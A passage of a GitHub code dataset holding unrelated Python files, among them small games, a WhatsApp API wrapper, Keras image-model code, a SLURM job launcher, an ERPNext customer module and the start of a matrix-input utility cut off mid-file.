letters. 
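        A hedged toy trace of the reveal logic described here, using a made-up
        word; it mirrors the loop below without the Tkinter parts:

            # guessed letter 'E' against the spaced word "S W E D E N":
            spaced = "S W E D E N"
            shown = list("_ _ _ _ _ _")
            for pos, ch in enumerate(spaced):
                if ch == "E":
                    shown[pos] = ch
            # "".join(shown) -> "_ _ E _ E _"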
Also it changes the\n picture of Hangman accordingly.\n\n :param letter: str, the letter of the button that was pressed.\n :param index: int, the index of the aforementioned button in the list,\n where the buttons exist.\n \"\"\"\n\n # Since the button was pressed, disable it.\n self.__buttons[index].configure(state=DISABLED)\n\n # Get the already guessed letters and make a list out of them.\n guessed_letters = list(self.__word_label.cget(\"text\"))\n\n # Also make a list of the letters of the country, so that we can\n # check the count.\n letters_of_the_country = list(self.__spaced_word)\n\n # If a letter is found, go through the letters of the country and\n # check how many there are.\n if self.__spaced_word.count(letter) > 0:\n for i in range(len(letters_of_the_country)):\n if letters_of_the_country[i] == letter:\n\n # Add the correctly guessed letters to the list,\n # and make them appear.\n guessed_letters[i] = letter\n\n self.__word_label.configure(text=\"\".join(guessed_letters),\n font=\"Euphemia 14\")\n\n # Check if won:\n if self.__word_label.cget(\"text\") == self.__spaced_word:\n # Call a new game and pop up a messagebox.\n messagebox.showinfo(\"Hangman\",\n \"YOU WON!\")\n self.new_game()\n else:\n self.__wrong_guesses += 1\n\n # Change the hangman picture according to the amount of guesses.\n self.__hangman_label.configure(image=\n self.__photos[self.__wrong_guesses])\n\n # If the user guessed 7 times already, it's game over.\n if self.__wrong_guesses == 7:\n messagebox.showwarning(\"Hangman\",\n \"Game Over\")\n\n self.new_game()\n\n\ndef main():\n Hangman()\n\n\nif __name__ == '__main__':\n main()\n \n","repo_name":"k9du/hangman-py","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4322545582","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 29 11:48:14 2020\n\n@author: Titus Newton\n\"\"\"\n\nimport random\n\nbalance = 0\nplay_again = True\nprint('*'*21)\nprint('Number Guessing Game.')\nprint('*'*21)\nname = input('Enter your Name: ')\nwhile play_again:\n if balance < 5:\n amount = int(input(f'Welcome {name}, kindly recharge with min 5 Rs/game or more to play the game: '))\n balance+= amount\n else:\n balance -= 5\n print('Rs. 5 deducted and remaining balance is',balance)\n c_guess = random.randint(1,10)\n for chance in range(1,4):\n print() # for an empty line\n print(f'chance: {chance} out of 3')\n print('-'*20)\n u_guess = int(input('Enter a guess in between 1 and 10: '))\n if c_guess == u_guess:\n print(f'Congratz {name} you have guessed correctly and')\n if chance == 1:\n print('You have won 100 Rs.')\n balance += 100\n elif chance == 2:\n print('You have won 75 Rs.')\n balance += 75\n else:\n print('You have won 50 Rs.')\n balance += 50\n break\n else:\n print(f'Sorry {name}, a wrong guess')\n if chance < 3:\n if u_guess < c_guess:\n print('I am thinking of a bigger number')\n else:\n print('I am thinking of a smaller number')\n else:\n print('I was thinking of a number',c_guess)\n choice = input('Do you wanna play again [yes/no]: ')\n if choice != 'yes':\n play_again = False\n withdraw = input('Do you wanna withdraw amount [yes/no]: ')\n if withdraw == 'yes' and balance > 0:\n print(f'Available balance is {balance}')\n withdraw_amt = int(input('Enter amount to withdraw: '))\n if withdraw_amt <= balance:\n print(f'{withdraw_amt} Rs. 
transferred to your bank a/c')\n balance -= withdraw_amt\n else:\n print('Insufficient balance')\n else:\n print('Insufficient balance')\n if balance > 0:\n print(f'Thanks {name} for your donation of Rs. {balance}')","repo_name":"Titus005/Python-Projects","sub_path":"simple_guessing_game.py","file_name":"simple_guessing_game.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71668303117","text":"import os\nimport requests\n\nimport json\n\n\nclass WhatsAppWrapper:\n\n API_URL = \"https://graph.facebook.com/v13.0/\"\n API_TOKEN = os.environ.get(\"WHATSAPP_API_TOKEN\")\n NUMBER_ID = os.environ.get(\"WHATSAPP_NUMBER_ID\")\n\n def __init__(self):\n self.headers = {\n \"Authorization\": f\"Bearer {self.API_TOKEN}\",\n \"Content-Type\": \"application/json\",\n }\n self.API_URL = self.API_URL + self.NUMBER_ID\n\n def send_template_message(self, template_name, language_code, phone_number):\n\n payload = json.dumps({\n \"messaging_product\": \"whatsapp\",\n \"to\": phone_number,\n \"type\": \"template\",\n \"template\": {\n \"name\": template_name,\n \"language\": {\n \"code\": language_code\n }\n }\n })\n\n response = requests.request(\"POST\", f\"{self.API_URL}/messages\", headers=self.headers, data=payload)\n\n assert response.status_code == 200, \"Error sending message\"\n\n return response.status_code\n\n def process_webhook_notification(self, data):\n \"\"\"_summary_: Process webhook notification\n For the moment, this will return the type of notification\n \"\"\"\n\n response = []\n\n for entry in data[\"entry\"]:\n\n for change in entry[\"changes\"]:\n response.append(\n {\n \"type\": change[\"field\"],\n \"from\": change[\"value\"][\"metadata\"][\"display_phone_number\"],\n }\n )\n\n return response\n","repo_name":"koladev32/flask-whatsapp-cloud-api","sub_path":"app/whatsapp_client.py","file_name":"whatsapp_client.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"34258393417","text":"#CurrencyRates Class\r\n\r\nclass CurrencyRates:\r\n \r\n def __init__(self, currencyName, currencyCode, euro_to_currency, currency_to_euro):\r\n self.currencyName = currencyName\r\n self.currencyCode = currencyCode\r\n self.euro_to_currency = float(euro_to_currency)\r\n self.currency_to_euro = float(currency_to_euro)\r\n\r\n def __str__(self):\r\n return (\"\\n%s:%s \\n%s:%s \\n%s:%.3f \\n%s:%.3f\" % ('Currency Name',self.currencyName,\r\n 'Curency Code',self.currencyCode, 'ConvFrmEuro',self.euro_to_currency,\r\n 'ConvToEuro',self.currency_to_euro))\r\n \r\n","repo_name":"BobGanti/Bobga-Airline-Fuel-Manager","sub_path":"CurrencyRates.py","file_name":"CurrencyRates.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"41075004057","text":"import tensorflow as tf\r\nfrom tensorflow.keras.models import Model\r\n\r\nfrom .layers import Base\r\n\r\n\r\nclass StochDepth(tf.keras.Model):\r\n \"\"\"Batchwise Dropout used in EfficientNet, optionally sans rescaling.\"\"\"\r\n\r\n def __init__(self, drop_rate, scale_by_keep=False, **kwargs):\r\n super().__init__(**kwargs)\r\n self.drop_rate = drop_rate\r\n self.scale_by_keep = scale_by_keep\r\n\r\n def call(self, x, training):\r\n if not training:\r\n return x\r\n\r\n batch_size = tf.shape(x)[0]\r\n r = tf.random.uniform(shape=[batch_size, 1, 1], 
dtype=x.dtype)\r\n keep_prob = 1.0 - self.drop_rate\r\n binary_tensor = tf.floor(keep_prob + r)\r\n if self.scale_by_keep:\r\n x = x / keep_prob\r\n return x * binary_tensor\r\n\r\n\r\nclass Affine(tf.keras.layers.Layer):\r\n def __init__(self, channels, **kwargs):\r\n super().__init__(**kwargs)\r\n self.alpha = self.add_weight(\r\n name=\"alpha\",\r\n shape=(channels,),\r\n initializer=\"ones\",\r\n trainable=True,\r\n )\r\n self.beta = self.add_weight(\r\n name=\"beta\",\r\n shape=(channels,),\r\n initializer=\"zeros\",\r\n trainable=True,\r\n )\r\n\r\n def call(self, x):\r\n return self.alpha * x + self.beta\r\n\r\n\r\ndef MLP(x, dim, prefix=\"\"):\r\n out = tf.keras.layers.Dense(dim * 4, name=f\"{prefix}_dense_01\")(x)\r\n out = tf.keras.layers.Activation(activation=\"gelu\", name=f\"{prefix}_act_01\")(out)\r\n out = tf.keras.layers.Dense(dim, name=f\"{prefix}_dense_02\")(out)\r\n return out\r\n\r\n\r\ndef CaiT_LayerScale_init(network_depth):\r\n if network_depth <= 18:\r\n return 1e-1\r\n elif network_depth <= 24:\r\n return 1e-5\r\n else:\r\n return 1e-6\r\n\r\n\r\ndef ResMLP_Blocks(x, nb_patches, dim, layerscale_init, stochdepth_rate, prefix=\"\"):\r\n out = x\r\n out = Affine(channels=dim)(out)\r\n out = tf.keras.layers.Permute(dims=(2, 1))(out)\r\n out = tf.keras.layers.Dense(nb_patches, name=f\"{prefix}_dense_01\")(out)\r\n out = tf.keras.layers.Permute(dims=(2, 1))(out)\r\n out = Base.SkipInitChannelwise(channels=dim, init_val=layerscale_init)(out)\r\n\r\n if stochdepth_rate > 0.0:\r\n out = StochDepth(stochdepth_rate, scale_by_keep=True)(out)\r\n\r\n x = tf.keras.layers.Add()([out, x])\r\n\r\n out = x\r\n out = Affine(channels=dim)(out)\r\n out = MLP(out, dim, prefix=f\"{prefix}_mlp\")\r\n out = Base.SkipInitChannelwise(channels=dim, init_val=layerscale_init)(out)\r\n\r\n if stochdepth_rate > 0.0:\r\n out = StochDepth(stochdepth_rate, scale_by_keep=True)(out)\r\n\r\n out = tf.keras.layers.Add()([out, x])\r\n return out\r\n\r\n\r\ndefinitions = {\r\n \"RMLP-S12\": {\"patch_size\": 16, \"dim\": 384, \"depth\": 12},\r\n \"RMLP-S24\": {\"patch_size\": 16, \"dim\": 384, \"depth\": 24},\r\n \"RMLP-B24\": {\"patch_size\": 16, \"dim\": 768, \"depth\": 24},\r\n}\r\n\r\n\r\ndef ResMLP(\r\n in_shape=(320, 320, 3),\r\n out_classes=2000,\r\n definition_name=\"RMLP-S24\",\r\n input_scaling=\"inception\",\r\n):\r\n definition = definitions[definition_name]\r\n dim = definition[\"dim\"]\r\n depth = definition[\"depth\"]\r\n patch_size = definition[\"patch_size\"]\r\n layerscale_init = CaiT_LayerScale_init(depth)\r\n stochdepth_rate = 0.1\r\n\r\n nb_patches = (in_shape[0] * in_shape[1]) // (patch_size**2)\r\n\r\n img_input = tf.keras.layers.Input(shape=in_shape)\r\n x = Base.input_scaling(method=input_scaling)(img_input)\r\n\r\n prefix = \"root\"\r\n x = tf.keras.layers.Conv2D(\r\n filters=dim,\r\n kernel_size=patch_size,\r\n strides=patch_size,\r\n padding=\"same\",\r\n name=f\"{prefix}_conv2d_01\",\r\n )(x)\r\n x = tf.keras.layers.Reshape(target_shape=(-1, dim))(x)\r\n\r\n for i in range(depth):\r\n prefix = f\"block{i}\"\r\n curr_stochdepth_rate = (stochdepth_rate / depth) * i\r\n x = ResMLP_Blocks(\r\n x, nb_patches, dim, layerscale_init, curr_stochdepth_rate, prefix\r\n )\r\n\r\n x = Affine(dim)(x)\r\n x = tf.keras.layers.GlobalAveragePooling1D(name=\"predictions_globalavgpooling\")(x)\r\n x = tf.keras.layers.Dense(out_classes, name=\"predictions_dense\")(x)\r\n x = tf.keras.layers.Activation(\"sigmoid\", name=\"predictions_sigmoid\")(x)\r\n\r\n model = Model(img_input, x, 
name=f\"ResMLP-{definition_name}\")\r\n return model\r\n","repo_name":"SmilingWolf/SW-CV-ModelZoo","sub_path":"Models/ResMLP.py","file_name":"ResMLP.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"29"} +{"seq_id":"36422880392","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[35]:\n\n\nimport os, re, glob, sys\n\n\n# In[36]:\n\n\npipeline_name = 'PI' # python + ilastik\ndata_path = '/home/exacloud/gscratch/HeiserLab/images/'\nplateID = sys.argv[1]\ninput_files_path = os.path.join(data_path+plateID,\"Analysis\",pipeline_name,\"intermediate_files\")\nimage_stack_paths = sorted(glob.glob(input_files_path+\"/*stack.tif\"))\nmask_paths = sorted(glob.glob(input_files_path+\"/*Segmentation.h5\"))\nmainpath = os.path.join(data_path,plateID,\"Analysis\",pipeline_name)\n\n\n# Only create an job if there is no output file.\n\n# In[59]:\n\n\nwells = sorted(set(re.findall(r\"_[A-Z][1-9]_\", ''.join(mask_paths)))) #get a unique set of the wells with images that have been segmented\n\nfor well in wells:\n #initate a job if the csv file for the current well does not exists\n l1_file_path = data_path+plateID+\"/Analysis/\"+pipeline_name+\"/\"+plateID+well+\"level_1.csv\"\n well = re.sub(\"_\",\"\",well)\n if not os.path.exists(l1_file_path):\n cmd = 'srun -c 8 -J M'+plateID[3:7]+well[0:2]+' -o M'+plateID[3:7]+well[0:2]+'_out.txt -t 23:00:00 python Apply_ilastik_masks.py '+plateID+' '+well+' &'\n print(\"launching job with command \"+cmd)\n returned_value = os.system(cmd) # returns the exit code in unix\n if returned_value == 0:\n print(\"launched job to create data for \"+l1_file_path)\n else:\n print(\"failed to launch job to create data for \"+l1_file_path)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"markdane/CellTracking","sub_path":"python/generate_apply_ilastik_jobs.py","file_name":"generate_apply_ilastik_jobs.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"19110473410","text":"# Youtube Video Downloader\n# This is a little training project\n# From \"Internet Made Coder\" on Youtube\n# sudo pip3 install pytube\nfrom pytube import YouTube\nfrom sys import argv\n\n\ndef start():\n e_link = argv[1]\n e_yt = YouTube(e_link)\n print(\"Titre : \", e_yt.title)\n print(\"Vues :\", e_yt.views)\n\n e_yd = e_yt.streams.get_highest_resolution()\n e_yd.download(\"./videos_downloaded\")\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"BossaMuffin/Function_YoutubeVideoDonwloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"11256999744","text":"import logging\nfrom .subject import Subject, Event\n\n\"\"\" Class that receive an Event from the bot and notify about such an update all its Observers\"\"\"\nclass Controller(Subject):\n def __init__(self) -> None:\n super().__init__()\n self.events = [] \n \n def receive_event(self, event: Event):\n logging.info(f\"Controller accepted {event.status} #{event.event_id}\")\n self.events.append(event)\n self.send_event(event)\n \n def remove_event(self, event: Event):\n self.events.remove(event)\n logging.info(f\"Controller removed Event #{event.event_id} from the list of Events\")\n \n def send_event(self, event: Event):\n if self.events:\n event = self.events[-1]\n self.notify(event)\n logging.info(f\"Controller sent Event 
#{event.event_id} to Observers\")\n self.remove_event(event)\n else:\n logging.info(f\"There are no Events to work on\")\n","repo_name":"nllllibeth/reminder_bot","sub_path":"observer_pattern/subject/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"74651054799","text":"\"\"\"Prototype Runtime for Small ResNet Model\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom OpenImagesClassifier import small_resnet_model as rs\nfrom OpenImagesClassifier import config\n\nimport tensorflow as tf\nimport sqlite3\nimport os\nimport numpy as np\n\n# only for prototyping\nimport cv2\nimport time\n\ndef select_random_from_db(count, subset):\n X = np.zeros([count, 224, 224, 3]) # only prototype no data augmentation here\n y = np.zeros([count])\n with sqlite3.connect(config.DATABASE['filename']) as conn:\n c = conn.cursor()\n result = c.execute(\"\"\"SELECT I.ImageID, D.DisplayLabelName, D.ClassNumber FROM Images I\n INNER JOIN Labels L ON I.ImageID = L.ImageID\n INNER JOIN Dict D ON L.LabelName = D.LabelName\n WHERE I.Subset = ? \n ORDER BY random() \n LIMIT ?\"\"\", (subset, count))\n\n for i, row in enumerate(result.fetchall()):\n path = config.DATA_DIRECTORY + \"/Images/{}/{}/{}.{}\".format(row[1], subset, row[0], \"jpg\")\n if os.path.exists(path):\n image = cv2.imread(path)\n resized = cv2.resize(image, dsize=(224, 224))\n resized = resized.astype(float)\n X[i] = resized / 255.0\n y[i] = row[2]\n\n return X, y\n\n\ndef trainable_network(X, y):\n\n logits = rs.build_small_resnet(X, 10, True)\n\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits)\n loss = tf.reduce_mean(xentropy, name='loss')\n tf.summary.scalar('loss', loss)\n\n optimizer = tf.train.AdamOptimizer()\n training_op = optimizer.minimize(loss)\n return training_op, tf.summary.merge_all(), logits\n\n\ndef inference_network(X):\n logits = rs.build_small_resnet(X, 10, False)\n softmax = tf.nn.softmax(logits)\n return softmax\n\n\ndef train():\n time_1 = time.time()\n X_batch, y_batch = select_random_from_db(256, 'train')\n X = tf.placeholder(tf.float32, shape=(None, 224, 224, 3), name='X')\n y = tf.placeholder(tf.int32, shape=(None), name='y')\n\n train_op, merged, logits = trainable_network(X, y)\n\n with tf.Session() as sess:\n\n train_writer = tf.summary.FileWriter(config.SUMMARY_DIR + '/train', sess.graph)\n run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n\n saver = tf.train.Saver()\n\n tf.global_variables_initializer().run()\n checkpoint_path = tf.train.latest_checkpoint(config.MODEL_SAVE_DIR)\n if checkpoint_path is not None:\n saver.restore(sess, checkpoint_path)\n print(\"Loaded saved Model\")\n\n summary, _ = sess.run([merged, train_op], feed_dict={X: X_batch, y: y_batch}, options=run_options,\n run_metadata=run_metadata)\n\n saved_path = saver.save(sess, config.MODEL_SAVE_DIR + '/small_resnet.ckpt')\n print(\"Saved model to path:\", saved_path)\n train_writer.add_run_metadata(run_metadata, tag='runtime-test')\n train_writer.add_summary(summary)\n train_writer.flush()\n\n delta_time = time.time() - time_1\n print(\"Delta Time:\", delta_time)\n\n\ndef predict():\n X_batch, y_batch = select_random_from_db(10, 'train')\n X = tf.placeholder(tf.float32, shape=(None, 224, 224, 3), name='X')\n\n infer_network = inference_network(X)\n\n with 
tf.Session() as sess:\n saver = tf.train.Saver()\n tf.global_variables_initializer().run()\n checkpoint_path = tf.train.latest_checkpoint(config.MODEL_SAVE_DIR)\n if checkpoint_path is not None:\n saver.restore(sess, checkpoint_path)\n print(\"Loaded saved Model\")\n\n predictions = sess.run([infer_network], feed_dict={X: X_batch})\n\n print(y_batch)\n print(predictions)\n\nif __name__ == '__main__':\n train()\n\n","repo_name":"tkrieger/OpenImagesClassifier","sub_path":"OpenImagesClassifier/small_resnet_prototype.py","file_name":"small_resnet_prototype.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"25286094781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 22 11:46:25 2014\n\nThis writes the weather forecast into the SVG file\n\n@author: dario\n\"\"\"\nimport datetime\nimport codecs\nfrom symboldict import symboldict # this loads all the forecast symbols\n\ndef svgyr(wetteryr):\n # replace sunrise and sunset\n sunrise = datetime.datetime.strptime( wetteryr['sun']['rise'], '%Y-%m-%dT%H:%M:%S' ) \n sunset = datetime.datetime.strptime( wetteryr['sun']['set'], '%Y-%m-%dT%H:%M:%S' )\n tmplt = codecs.open('template-subst.svg', 'r', encoding='utf-8').read()\n tmplt = tmplt.replace('SUNSET', sunset.strftime('%H:%M'))\n tmplt = tmplt.replace('SUNRISE', sunrise.strftime('%H:%M'))\n \n # replace the forecast\n #Day = {'0': str('0:00 bis 6:00'), '1': str('6:00 bis 12:00'),'2': str('12:00 bis 18:00'),'3': str('18:00 bis 0:00')}\n Day = {'0': str(u'2. Nachthälfte'), '1':'Vormittag', '2':'Nachmittag', '3':str(u'1. Nachthälfte')}\n Symbols = symboldict()\n i=1\n liste = ['std0', 'std6', 'std12']\n for key in liste:\n nr=str(i)\n tmplt = tmplt.replace('TEMP'+nr, wetteryr[key]['temp']['value'])\n tmplt = tmplt.replace('PREC'+nr, wetteryr[key]['prec']['value'])\n tmplt = tmplt.replace('DAYTIME'+nr, Day[wetteryr[key]['time']['period']])\n tmplt = tmplt.replace('SYMBOL'+nr, Symbols[wetteryr[key]['sky']['number']])\n i+=1\n \n # write the new SVG\n codecs.open('template-yr.svg', 'w', encoding='utf-8').write(tmplt)\n return 0\n","repo_name":"zeitgespenst/WeatherDisplay","sub_path":"Server/svgyr.py","file_name":"svgyr.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"33987074563","text":"import sys\ninput = sys.stdin.readline\n\ndx = [0, -1, 0, 1, 0]\ndy = [0, 0, -1, 0, 1]\n\ndef recur(cnt, cost):\n global min_cost\n if cnt == 3:\n min_cost = min(min_cost, cost)\n return\n\n for y in range(1, n-1):\n for x in range(1, n-1):\n temp = []\n for i in range(5):\n nx = x + dx[i]\n ny = y + dy[i]\n if visit[ny][nx] == 1:\n break\n temp.append((nx, ny))\n else:\n add_cost = 0\n for nx, ny in temp:\n visit[ny][nx] = 1\n add_cost += board[ny][nx]\n recur(cnt + 1, cost + add_cost)\n for nx, ny in temp:\n visit[ny][nx] = 0\n\nn = int(input())\nboard = []\nmin_cost = 3001\n\nfor _ in range(n):\n board.append(list(map(int, input().split())))\n\nvisit = [[0 for _ in range(n)] for _ in range(n)]\nrecur(0, 0)\nprint(min_cost)","repo_name":"elcote/elice-coding-test","sub_path":"박근백/week5/[14620]꽃길/14620.py","file_name":"14620.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"74491694799","text":"import frappe\nfrom frappe import _\nfrom frappe.utils.data import cint, 
cstr\nfrom erpnext.selling.doctype.customer.customer import Customer\n\ndef maintance_contact_details(doc,actions):\n \n if doc.dealer_name and doc.dealer_contact_no and (actions == \"after_insert\" or not doc.is_new()):\n com_add = frappe.get_all(\"Dynamic Link\", {\"parenttype\": \"Contact\", \"link_doctype\": doc.doctype, \"link_name\": doc.name}, pluck=\"parent\")\n for i in com_add:\n contact = frappe.get_doc(\"Contact\", i)\n if contact.maintenance_type == \"Dealer\":\n contact.update(\n {\n 'phone_nos':\n [{\"phone\" :doc.dealer_contact_no}], \n 'first_name':f\"{doc.dealer_name} Dealer\"\n })\n contact.save(ignore_permissions=True)\n if not frappe.db.exists(\"Contact\", {'maintenance_type': \"Dealer\", \"name\" : ['in',com_add]}):\n document_dc = frappe.new_doc(\"Contact\")\n document_dc.first_name = f\"{doc.dealer_name} Dealer\"\n document_dc.maintenance_type = \"Dealer\"\n document_dc.append('phone_nos', \n dict(\n phone = doc.dealer_contact_no,\n is_primary_mobile_no = 1\n ))\n document_dc.append('links', \n dict(\n link_doctype = doc.doctype,\n link_name = doc.name\n ))\n document_dc.save(ignore_permissions=True)\n if doc.supervisor_name and doc.supervisor_number and (actions == \"after_insert\" or not doc.is_new()):\n com_add = frappe.get_all(\"Dynamic Link\", {\"parenttype\": \"Contact\", \"link_doctype\": doc.doctype, \"link_name\": doc.name}, pluck=\"parent\")\n for i in com_add:\n contact = frappe.get_doc(\"Contact\", i)\n if contact.maintenance_type == \"Supervisor\":\n contact.update(\n {\n 'phone_nos':\n [{\"phone\" :doc.supervisor_number}], \n 'first_name':f\"{doc.supervisor_name} Supervisor\"\n })\n contact.save(ignore_permissions=True)\n if not frappe.db.exists(\"Contact\", {'maintenance_type': \"Supervisor\", \"name\" : ['in',com_add]}):\n document_dc = frappe.new_doc(\"Contact\")\n document_dc.first_name = f\"{doc.supervisor_name} Supervisor\"\n document_dc.maintenance_type = \"Supervisor\"\n document_dc.append('phone_nos', \n dict(\n phone = doc.supervisor_number,\n is_primary_mobile_no = 1\n ))\n document_dc.append('links', \n dict(\n link_doctype = doc.doctype,\n link_name = doc.name\n ))\n document_dc.save(ignore_permissions=True)\n\ndef set_exisiting_farm(doc,actions):\n if doc.name and (actions == \"after_insert\" or not doc.is_new()):\n if doc.lead_name:\n farm_details = frappe.get_value(\"Farm Details\", {\"lead\": doc.lead_name},\"name\")\n if farm_details:\n farm = frappe.get_doc(\"Farm Details\", farm_details)\n if farm.lead == doc.lead_name:\n farm.update(\n {\n 'customer':doc.name\n })\n farm.save(ignore_permissions=True)\n\n\n@frappe.whitelist()\ndef get_farm_list(ref_doctype, ref_name):\n if(not ref_doctype or not ref_name):\n return\n field = frappe.scrub(ref_doctype)\n farm_list = frappe.get_all(\"Farm Details\", filters={field:ref_name}, fields=[\"*\"])\n for i in farm_list:\n i['compatible_breed'] = \", \".join(frappe.get_all(\"Compatible Breed Table\", filters={\"parent\":i['name']}, pluck=\"compatible_breed\"))\n i[\"display\"] = \"\"\n if(i[\"farm_name\"]):\n i[\"display\"] += f\"\"\"\n
<b>Farm: </b>{i[\"farm_name\"] or \"\"}<br>\n \"\"\"\n if(i[\"farm_location\"]):\n i[\"display\"] += f\"\"\"\n <b>Loc: </b>{i[\"farm_location\"] or \"\"}<br>\n \"\"\"\n if(i[\"ton_of_feed\"]):\n i[\"display\"] += f\"\"\"\n <b>Ton of Feed: </b>{i[\"ton_of_feed\"] or \"\"}<br>\n \"\"\"\n if(i[\"chick_capacity__laying\"]):\n i[\"display\"] += f\"\"\"\n <b>Laying Capacity: </b>{i[\"chick_capacity__laying\"] or \"\"}<br>\n \"\"\"\n if(i[\"compatible_breed\"]):\n i[\"display\"] += f\"\"\"\n <b>Compatible Breeds: </b>{i[\"compatible_breed\"] or \"\"}<br>\n \"\"\"\n return farm_list\n\ndef create_farm(self, event=None):\n if self.flags.is_new_doc and self.get(\"batch_size\"):\n doc = frappe.new_doc('Farm Details')\n doc.update({\n \"customer\": self.name,\n \"chick_capacity__laying\": self.get(\"batch_size\"),\n \"farm_name\": (self.get('customer_name') or '') + ' Farm'\n })\n if frappe.db.get_value(\"Farm Details\", doc.get(\"farm_name\")) and not frappe.flags.in_import:\n count = frappe.db.sql(\n \"\"\"select ifnull(MAX(CAST(SUBSTRING_INDEX(name, ' ', -1) AS UNSIGNED)), 0) from `tabFarm Details`\n where name like %s\"\"\",\n \"%{0} - %\".format(self.customer_name),\n as_list=1,\n )[0][0]\n count = cint(count) + 1\n\n doc.update({\n \"__newname\": \"{0} - {1}\".format(self.customer_name, cstr(count))\n })\n\n doc.insert()\n\n\nclass TSCustomer(Customer):\n def create_primary_contact(self):\n if not self.customer_primary_contact and not self.lead_name:\n if self.mobile_no or self.email_id:\n contact = make_contact(self)\n self.db_set(\"customer_primary_contact\", contact.name)\n self.db_set(\"mobile_no\", self.mobile_no)\n self.db_set(\"email_id\", self.email_id)\n\n def create_primary_address(self):\n from frappe.contacts.doctype.address.address import get_address_display\n\n if self.flags.is_new_doc and self.get(\"address_line1\"):\n address = make_address(self)\n address_display = get_address_display(address.name)\n\n self.db_set(\"customer_primary_address\", address.name)\n self.db_set(\"primary_address\", address_display)\n\ndef make_contact(args, is_primary_contact=1):\n contact = frappe.get_doc(\n {\n \"doctype\": \"Contact\",\n \"first_name\": args.get(\"name\"),\n \"is_primary_contact\": is_primary_contact,\n \"designation\": args.get(\"designation\"),\n \"links\": [{\"link_doctype\": args.get(\"doctype\"), \"link_name\": args.get(\"name\")}],\n }\n )\n if args.get(\"email_id\"):\n contact.add_email(args.get(\"email_id\"), is_primary=True)\n if args.get(\"mobile_no\"):\n contact.add_phone(args.get(\"mobile_no\"), is_primary_mobile_no=True)\n contact.insert()\n\n return contact\n\ndef make_address(args, is_primary_address=1):\n reqd_fields = []\n for field in [\"city\", \"country\"]:\n if not args.get(field):\n reqd_fields.append(\"<li>\" + field.title() + \"</li>\")\n\n if reqd_fields:\n msg = _(\"Following fields are mandatory to create address:\")\n frappe.throw(\n \"{0}<br><br><ul>{1}</ul>
    \".format(msg, \"\\n\".join(reqd_fields)),\n title=_(\"Missing Values Required\"),\n )\n frappe.errprint(args.get(\"gstin\") or \"None\")\n address = frappe.get_doc(\n {\n \"doctype\": \"Address\",\n \"address_title\": args.get(\"name\"),\n \"address_line1\": args.get(\"address_line1\"),\n \"address_line2\": args.get(\"address_line2\"),\n \"city\": args.get(\"city\"),\n \"custom_district\": args.get(\"district\"),\n \"state\": args.get(\"state\"),\n \"pincode\": args.get(\"pincode\"),\n \"custom_aadhar_no\": args.get(\"aadhar_no\"),\n \"country\": args.get(\"country\") or \"India\",\n \"gstin\": args.get(\"gstin\"),\n \"links\": [{\"link_doctype\": args.get(\"doctype\"), \"link_name\": args.get(\"name\")}],\n \"gst_category\": \"Registered Regular\" if args.get(\"gstin\") else \"Unregistered\",\n }\n ).insert()\n\n return address","repo_name":"thirvusoft/SVE","sub_path":"sri_venkatesa_enterprises/sri_venkatesa_enterprises/custom/py/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9579698505","text":"import csv\nimport numpy as np\nimport copy\nfrom fractions import Fraction\n\ndef slau_inp_matr():\n \"\"\"\n Функция возвращает матрицу, введённую пользователем с клавиатуры.\n\n Returns\n -------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n \"\"\"\n while True:\n try:\n m = int(input('Сколько будет строк в матрице? '))\n except:\n print('Вы ввели не число')\n else:\n if m > 0:\n break\n else:\n print('Вы ввели не натуральное число') \n\n while True:\n try:\n n = int(input('Сколько будет столбцов в матрице? '))\n except:\n print('Вы ввели не число')\n else:\n if n > 0:\n break\n else:\n print('Вы ввели не натуральное число')\n \n print(\"Введите элементы матрицы (заполнение идёт по строкам)\")\n a = []\n for i in range(m):\n a.append([])\n for j in range(n):\n while True:\n try:\n print(f'Введите элемент a[{i+1}][{j+1}]')\n elem = eval(input())\n except:\n print('Вы ввели не число')\n else:\n break\n a[i].append(elem)\n return a\n\n\n\ndef csv_inp_matr(filename):\n \"\"\"\n Функция импортирует матрицу из csv\n\n Parameters\n ----------\n filename : str\n Абсолютный или локальный 